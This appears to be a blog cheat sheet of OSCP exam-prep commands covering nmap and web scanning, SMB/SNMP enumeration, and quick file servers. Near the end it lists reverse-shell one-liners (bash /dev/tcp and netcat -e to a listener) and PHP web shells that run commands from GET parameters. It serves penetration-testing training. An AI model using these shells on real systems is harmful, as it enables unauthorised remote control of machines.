In previous article, we’ve shared a wide range of tools for sub-domain enumeration which helps pentesters and bug hunters collect and gather subdomains for the domain they are targeting.
Enumeration is the most important thing you can do, at that inevitable stage where you find yourself hitting a wall, 90% of the time it will be because you haven’t done enough enumeration.
There are a ton of certifications in this hacking and security domain but Offensive Security certifications are the ones that will really make you realize that you have actually earned it, rather than just crossed your fingers and did a MCQ exam.
Yes we’re talking about OSCP (Offensive Security Certified Professional). OSCP preparation, lab, and the exam is an awesome journey where you will experience lots of excitement, pain, suffering, frustration, confidence, and motivation where learning will be constant throughout the journey.
Below are the few commands which will be very helpful for OSCP preparation are as follows:
Nmap Commands
[#] Quick TCP Scan
Command: nmap -sC -sV -vv -oA quick 192.168.1.10
[#] Quick UDP Scan
Command: nmap -sU -sV -vv -oA quick_udp 192.168.1.10
[#] Full TCP Scan
Command: nmap -sC -sV -p- -vv -oA full 192.168.1.10
Web Scanning
[#] Nikto
Command: nikto -h 192.168.1.10
[#] Dirsearch
Command: python dirsearch.py -u http://192.168.1.10 -e php,txt,html,log,conf,cfg,ini,pdf -x 301,403,503,302 –random-agent
[#] Directory Buster
Command: dirb http://192.168.1.10/ /usr/share/wordlists/dirb/common.txt
[#] Whatweb
Command: whatweb -v -a 3 192.168.1.10
[#] Gobuster
Command: gobuster -e -u http://192.168.1.10/ -w /usr/share/wordlists/dirb/common.txt
[#] Wfuzz
Command: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt –hc 404 http://192.168.1.10
[#] WPScan
Command: wpscan -u http://192.168.1.10/
[#] Joomscan
Command: joomscan -u http://192.168.1.10/
Port Checking
[#] Netcat Banner Grabbing
Command: nc -v 192.168.1.10 port
[#] Telnet Banner Grabbing
Command: telnet 192.168.1.10 port
SMB
[#] SMB Vulnerability Scan
Command: nmap -p 445 -vv –script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.1.10
[#] SMB Users & Shares Scan
Command: nmap -p 445 -vv –script=smb-enum-shares.nse,smb-enum-users.nse 192.168.1.10
[#] Enum4linux
Command: enum4linux -a 192.168.1.10
[#] Null connect
Command: rpcclient -U “” 192.168.1.10
[#] Connect to SMB share
Command: smbclient //MOUNT/share
SNMP
[#] SNMP Enumeration
Command: snmp-check 192.168.1.10 -c public
Python Servers
[#] Simple Web Server
Command: python -m SimpleHTTPServer 80
[#] FTP Server
Command: python -m pyftpdlib -p 21 -w
Reverse Shells
[#] Bash Shell
Command: bash -i >& /dev/tcp/192.168.1.10/4443 0>&1
[#] Netcat linux
Command: nc -e /bin/sh 192.168.1.10 4443
[#] Netcat windows
Command: nc -e cmd.exe 192.168.1.10 4443
PHP
[#] PHP command Injection with system from GET Request
Command: <?php echo system($_GET[“cmd”]);?>
[#] PHP Command Injection with Shell Exec from GET Request
Command: <?php echo shell_exec($_GET[“cmd”]);?>
SQL Injection
[#] SQL Injection Exploitation with Sqlmap
You may also like:Command: sqlmap -u http://10.10.10.10 –dbs
- CTEM – A Strategic Approach to Mitigating Cyber Risks
- AI in Penetration Testing – Revolutionizing Security Assessments
- Protecting Your Organization from AI-Enhanced Social Engineering Attacks
- The Rise of AI-Powered Cyber Attacks in 2025
- Top 5 Penetration Testing Methodologies to Follow in 2025
- Top 10 Penetration Testing Tools Every Security Professional Should Know in 2025
- Emerging Trends in Vulnerability Assessment and Penetration Testing (VAPT) for 2025
- The Role of Cybersecurity in Protecting IoT Devices in 2025
- Understanding the Five Phases of Penetration Testing
- Top 20 Cybersecurity Career Options